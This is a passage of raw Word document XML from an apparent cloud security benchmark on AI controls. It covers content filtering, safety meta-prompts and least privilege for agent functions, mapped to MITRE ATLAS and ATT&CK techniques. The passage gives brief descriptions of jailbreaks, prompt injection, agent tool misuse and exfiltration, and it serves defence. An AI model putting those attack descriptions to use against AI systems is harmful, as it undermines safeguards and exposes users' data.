          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Data poisoning (AML.T0022)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1212A57C" w14:textId="21550990" w:rsidR="004F4D04" w:rsidRPr="00E53977" w:rsidRDefault="004F4D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="450"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4D04">
        <w:t>Introducing malicious data to compromise model integrity during training or fine-tuning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624FE5C" w14:textId="15164FF9" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387" w:rsidP="00577387">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AI-2.1: Implement multi-layered content filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638D3F00" w14:textId="6FF3460D" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish a comprehensive content filtering and validation framework to safeguard AI models against malicious or harmful interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E6763A" w14:textId="2B25985E" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Input filtering and validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300287A5" w14:textId="53602E87" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Internal processing validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458183F3" w14:textId="30648E30" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>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testing during model evaluation to validate behavior under adversarial conditions, ensuring resilience against malicious inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4D6330" w14:textId="345D5C4B" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Output filtering and validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A08AF" w14:textId="4F4EA888" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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122" w:name="_Toc242449585"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>AI-3: Adopt safety meta-prompts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w14:paraId="2D954E52" w14:textId="230BC711" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678C3CC7" w14:textId="3FA7B717" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use safety meta-prompts or system instructions to guide AI models toward intended, secure, and ethical behavior while enhancing resistance to prompt injection attacks and other adversarial manipulations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481DF1B8" w14:textId="0E5E695D" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3CFCE898" w14:textId="28CF05D7" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Prompt injection attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A6770" w14:textId="664ABEB0" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Jailbreaking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE56286" w14:textId="74344A77" w:rsidR="000157D1" w:rsidRPr="00E53977" w:rsidRDefault="000157D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unintended or harmful outputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202BE6B8" w14:textId="2D5B2BB8" w:rsidR="000157D1" w:rsidRPr="00E53977" w:rsidRDefault="000157D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATLAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073C4322" w14:textId="6C272248" w:rsidR="000157D1" w:rsidRDefault="000157D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>LLM prompt injection (AML.T0051)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303B22E2" w14:textId="61DFC961" w:rsidR="003D4641" w:rsidRPr="00E53977" w:rsidRDefault="003D4641">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4641">
        <w:t>Adversaries manipulate a large language model by crafting malicious prompts that override system prompts or bypass safety mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2795A" w14:textId="55B53123" w:rsidR="000157D1" w:rsidRDefault="000157D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>LLM jailbreak injection - Direct (AML.T0054)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C4BBF" w14:textId="1C9192F0" w:rsidR="003D4641" w:rsidRPr="00E53977" w:rsidRDefault="003D4641">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4641">
        <w:t>Adversaries craft inputs to bypass safety protocols, causing the model to produce outputs that violate ethical, legal, or safety guidelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4222BF9B" w14:textId="0D9377D5" w:rsidR="000157D1" w:rsidRDefault="000157D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>AI Agent Tool Invocation (AML.T0053)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2B8703" w14:textId="1520CEF5" w:rsidR="003D4641" w:rsidRPr="00E53977" w:rsidRDefault="003D4641">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4641">
        <w:t xml:space="preserve">Adversaries use prompt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D4641">
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D4641">
        <w:t xml:space="preserve"> to trick an AI agent into invoking connected tools or executing unauthorized actions, such as accessing private data or running malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB9FEB3" w14:textId="6AE7C10B" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9" w:rsidP="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AI-3.1: Adopt safety meta-prompts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2447AFA9" w14:textId="5FC17C9F" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="216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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Design explicit role definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758CC973" w14:textId="5E53E509" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Embed prompts in system context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E9D17F" w14:textId="15DC21EF" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure meta-prompts within the model's system context or prepend them to user inputs during inference to ensure consistent application across all interactions, using Azure Machine Learning deployment configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454BA926" w14:textId="11232FAE" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Validate prompt effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60EAAD" w14:textId="0466C999" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Configure prompt prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683283A2" w14:textId="1B0CD7DF" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement input validation layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C450005" w14:textId="354631F4" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Conduct adversarial testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5CDF67" w14:textId="00C39304" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use spotlighting techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557254D1" w14:textId="412BBCF7" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Apply spotlighting to isolate and label untrusted data within prompts, integrate detection tools like Microsoft Prompt Shields to monitor for suspicious patterns, and enforce deterministic blocking of known data exfiltration methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5185B8" w14:textId="680BC77B" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy logging and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D652931" w14:textId="67378C51" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Maintain version control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C39BA54" w14:textId="45D5A1DD" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Use version-controlled repositories to manage meta-prompt iterations, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>documenting</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> changes and rationale to maintain audit trails for compliance and security reviews.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69020A1A" w14:textId="05DAE647" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate continuous testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39842A17" w14:textId="62657DB9" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy automated testing frameworks to periodically evaluate meta-prompt effectiveness against emerging threats, updating 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123" w:name="_Toc242449586"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>AI-4: Apply least privilege for agent functions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="750A4835" w14:textId="29E852E6" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B72C14C" w14:textId="50CF68F5" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Restrict the capabilities and access permissions of agent functions or plugins to the minimum required for their intended </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>purpose, reducing the attack surface and preventing unauthorized actions or data exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D40E638" w14:textId="37746A3B" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3966FE74" w14:textId="07B00EA0" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FF18FF" w14:textId="65980586" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized data access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A754C4" w14:textId="1DD8D0F6" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CE5BBA" w14:textId="2BE95D3E" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Compromised functions with broad access allow attackers to move across systems or networks, accessing additional resources, escalating their attack scope, and establishing persistent presence in the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E64685E" w14:textId="3892D402" w:rsidR="00CA4BB9" w:rsidRPr="00E53977" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E404688" w14:textId="751B89E4" w:rsidR="00CA4BB9" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Valid Accounts (T1078)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57426718" w14:textId="7CE09C0C" w:rsidR="00666C39" w:rsidRPr="00E53977" w:rsidRDefault="00666C39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C39">
        <w:t>Exploiting compromised or overly privileged AI agent accounts to gain unauthorized access to system resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777DC1C1" w14:textId="7B6D053C" w:rsidR="00CA4BB9" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lateral Tool Transfer (T1570)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB72F40" w14:textId="294756D7" w:rsidR="00666C39" w:rsidRPr="00E53977" w:rsidRDefault="00666C39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C39">
        <w:t>Using excessive AI agent privileges to navigate across system components or networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B3A8C" w14:textId="4E460AA3" w:rsidR="00D601CA" w:rsidRDefault="00CA4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Exfiltration (T1567)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868CAA7" w14:textId="2AF39019" w:rsidR="00666C39" w:rsidRPr="00E53977" w:rsidRDefault="00666C39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C39">
        <w:t>Extracting sensitive data via overly privileged AI agent functions to external systems.</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functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A72970" w14:textId="2593DA64" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="216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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Capability restriction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49258ABA" w14:textId="1E81EE09" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
